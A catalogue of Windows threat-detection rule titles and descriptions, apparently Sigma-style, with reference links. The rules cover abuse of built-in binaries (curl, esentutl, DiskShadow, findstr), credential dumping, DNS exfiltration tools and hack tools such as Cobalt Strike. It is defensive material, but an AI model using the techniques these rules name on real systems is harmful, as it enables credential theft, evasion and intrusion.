Suspicious File Download From File Sharing Domain Via Curl.EXE Detects potentially suspicious file download from file sharing domains using curl.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
Insecure Transfer Via Curl.EXE Detects execution of "curl.exe" with the "--insecure" flag. https://curl.se/docs/manpage.html
Insecure Proxy/DOH Transfer Via Curl.EXE Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. https://curl.se/docs/manpage.html
Suspicious Curl.EXE Download Detects a suspicious curl process start on Windows and outputs the requested document to a local file https://twitter.com/max_mal_/status/1542461200797163522, https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464, https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt, https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file
Local File Read Using Curl.EXE Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. https://curl.se/docs/manpage.html
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution. https://twitter.com/gN3mes1s/status/1222088214581825540, https://twitter.com/gN3mes1s/status/1222095963789111296, https://twitter.com/gN3mes1s/status/1222095371175911424
Uncommon Child Process Of Defaultpack.EXE Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/, https://www.echotrail.io/insights/search/defaultpack.exe
Remote File Download Via Desktopimgdownldr Utility Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html
Suspicious Desktopimgdownldr Command Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/, https://twitter.com/SBousseaden/status/1278977301745741825
Potential DLL Sideloading Via DeviceEnroller.EXE Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter https://mobile.twitter.com/0gtweet/status/1564131230941122561, https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html
Potentially Suspicious Child Process Of ClickOnce Application Detects potentially suspicious child processes of a ClickOnce deployment application https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
Arbitrary MSI Download Via Devinit.EXE Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system https://twitter.com/mrd0x/status/1460815932402679809, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/
DirLister Execution Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md, https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/
PowerShell Web Access Feature Enabled Via DISM Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature, https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a, https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41
Potentially Suspicious Child Process Of DiskShadow.EXE Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
Diskshadow Script Mode - Uncommon Script Extension Execution Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
Diskshadow Script Mode - Execution From Potential Suspicious Location Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow, https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf, https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware, https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
Dism Remove Online Package Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism, https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html
Dllhost.EXE Execution Anomaly Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. https://redcanary.com/blog/child-processes/, https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08, https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
DLL Sideloading by VMware Xfer Utility Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/
Potential Discovery Activity Via Dnscmd.EXE Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd, https://learn.microsoft.com/en-us/azure/dns/dns-zones-records, https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
DNS Exfiltration and Tunneling Tools Execution Well-known DNS Exfiltration tools execution https://github.com/iagox86/dnscat2, https://github.com/yarrick/iodine
Unusual Child Process of dns.exe Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html
Potential Application Whitelisting Bypass via Dnx.EXE Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/, https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Process Memory Dump Via Dotnet-Dump Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS. https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect, https://twitter.com/bohops/status/1635288066909966338
Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/, https://twitter.com/_felamos/status/1204705548668555264, https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
Binary Proxy Execution Via Dotnet-Trace.EXE Detects commandline arguments for executing a child process via dotnet-trace.exe https://twitter.com/bohops/status/1740022869198037480
Potential Recon Activity Using DriverQuery.EXE Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/, https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/, https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html
DriverQuery.EXE Execution Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/, https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/, https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html
Potentially Over Permissive Permissions Granted Using Dsacls.EXE Detects usage of Dsacls to grant over permissive permissions https://ss64.com/nt/dsacls.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)
Potential Password Spraying Attempt Using Dsacls.EXE Detects possible password spraying attempts using Dsacls https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone, https://ss64.com/nt/dsacls.html, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)
Domain Trust Discovery Via Dsquery Detects execution of "dsquery.exe" for domain trust discovery https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md, https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843
Suspicious Kernel Dump Using Dtrace Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 https://twitter.com/0gtweet/status/1474899714290208777?s=12, https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace
Potential Windows Defender AV Bypass Via Dump64.EXE Rename Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage. https://twitter.com/mrd0x/status/1460597833917251595
DumpMinitool Execution Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" https://twitter.com/mrd0x/status/1511415432888131586, https://twitter.com/mrd0x/status/1511489821247684615, https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/, https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f
Suspicious DumpMinitool Execution Detects suspicious ways to use the "DumpMinitool.exe" binary https://twitter.com/mrd0x/status/1511415432888131586, https://twitter.com/mrd0x/status/1511489821247684615, https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/
New Capture Session Launched Via DXCap.EXE Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/, https://twitter.com/harr0ey/status/992008180904419328
Esentutl Gather Credentials Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. https://twitter.com/vxunderground/status/1423336151860002816, https://attack.mitre.org/software/S0404/, https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/
Copying Sensitive Files with Credential Data Files with well-known filenames (sensitive files with credential data) copying https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/, https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Esentutl.yml
Esentutl Steals Browser Information One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/, https://redcanary.com/threat-detection-report/threats/qbot/, https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
Potentially Suspicious Event Viewer Child Process Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100
Potentially Suspicious Cabinet File Expansion Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll, https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/
Explorer Process Tree Break Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" https://twitter.com/CyberRaiju/status/1273597319322058752, https://twitter.com/bohops/status/1276357235954909188?s=12, https://twitter.com/nas_bench/status/1535322450858233858, https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/
File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder. https://ss64.com/nt/shell.html
Explorer NOUACCHECK Flag Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks https://twitter.com/ORCA6665/status/1496478087244095491
Remote File Download Via Findstr.EXE Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Findstr GPP Passwords Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr
Findstr Launching .lnk File Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/
LSASS Process Reconnaissance Via Findstr.EXE Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
Recon Command Output Piped To Findstr.EXE Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this technique to extract specific information they require in their reconnaissance phase. https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist, https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf, https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html
Permission Misconfiguration Reconnaissance Via Findstr.EXE Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions. https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Security Tools Keyword Lookup Via Findstr.EXE Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter. https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery, https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/, https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf
Insensitive Subfolder Search Via Findstr.EXE Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service
Finger.EXE Execution Detects execution of the "finger.exe" utility. Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating. https://twitter.com/bigmacjpg/status/1349727699863011328?s=12, https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/, http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
Filter Driver Unloaded Via Fltmc.EXE Detect filter driver unloading activity via fltmc.exe https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon, https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom
Sysmon Driver Unloaded Via Fltmc.EXE Detects possible Sysmon filter driver unloaded via fltmc.exe https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Forfiles.EXE Child Process Masquerading Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/
Forfiles Command Execution Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting. https://lolbas-project.github.io/lolbas/Binaries/Forfiles/, https://pentestlab.blog/2020/07/06/indirect-command-execution/
Uncommon FileSystem Load Attempt By Format.com Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs. https://twitter.com/0gtweet/status/1477925112561209344, https://twitter.com/wdormann/status/1478011052130459653?s=20
Use of FSharp Interpreters Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" Both can be used for AWL bypass and to execute F# code via scripts or inline. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac, https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/
Fsutil Drive Enumeration Attackers may leverage fsutil to enumerated connected drives. Turla has used fsutil fsinfo drives to list connected drives., https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml
Fsutil Behavior Set SymlinkEvaluation A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware, https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior
Fsutil Suspicious Invocation Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others). https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md, https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt
Potential Arbitrary Command Execution Via FTP.EXE Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe". https://lolbas-project.github.io/lolbas/Binaries/Ftp/
Arbitrary File Download Via GfxDownloadWrapper.EXE Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file. https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/
Suspicious Git Clone Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
Potentially Suspicious GoogleUpdate Child Process Detects potentially suspicious child processes of "GoogleUpdate.exe" https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
File Decryption Using Gpg4win Detects usage of Gpg4win to decrypt files https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.gpg4win.de/documentation.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/
File Encryption Using Gpg4win Detects usage of Gpg4win to encrypt files https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.gpg4win.de/documentation.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/
Portable Gpg.EXE Execution Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a, https://securelist.com/locked-out/68960/, https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md
File Encryption/Decryption Via Gpg4win From Suspicious Locations Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/
Arbitrary Binary Execution Using GUP Utility Detects execution of the Notepad++ updater (gup) to launch other commands or executables https://twitter.com/nas_bench/status/1535322445439180803
Gpresult Display Group Policy Information Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult, https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/, https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
File Download Using Notepad++ GUP Utility Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. https://twitter.com/nas_bench/status/1535322182863179776
Suspicious GUP Usage Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html
HH.EXE Execution Detects the execution of "hh.exe" to open ".chm" files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md, https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
Remote CHM File Download/Execution Via HH.EXE Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html, https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
HTML Help HH.EXE Suspicious Child Process Detects a suspicious child process of a Microsoft HTML Help (HH.exe) https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
Suspicious HH.EXE Execution Detects a suspicious execution of a Microsoft HTML Help (HH.exe) https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
HackTool - ADCSPwn Execution Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service https://github.com/bats3c/ADCSPwn
HackTool - Bloodhound/Sharphound Execution Detects command line parameters used by Bloodhound and Sharphound hack tools https://github.com/BloodHoundAD/BloodHound, https://github.com/BloodHoundAD/SharpHound
HackTool - F-Secure C3 Load by Rundll32 F-Secure C3 produces DLLs with a default exported StartNodeRelay function. https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
HackTool - Certify Execution Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. https://github.com/GhostPack/Certify
HackTool - Certipy Execution Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. https://github.com/ly4k/Certipy, https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
Operator Bloopers Cobalt Strike Commands Detects use of Cobalt Strike commands accidentally entered in the CMD shell https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf, https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/, https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
Operator Bloopers Cobalt Strike Modules Detects Cobalt Strike module/commands accidentally entered in CMD shell https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf, https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/, https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
CobaltStrike Load by Rundll32 Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. https://www.cobaltstrike.com/help-windows-executable, https://redcanary.com/threat-detection-report/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
Potential CobaltStrike Process Patterns Detects potential process patterns related to Cobalt Strike beacon activity https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
HackTool - CoercedPotato Execution Detects the use of CoercedPotato, a tool for privilege escalation https://github.com/hackvens/CoercedPotato, https://blog.hackvens.fr/articles/CoercedPotato.html
HackTool - Covenant PowerShell Launcher Detects suspicious command lines used in Covenant luanchers https://posts.specterops.io/covenant-v0-5-eee0507b85ba
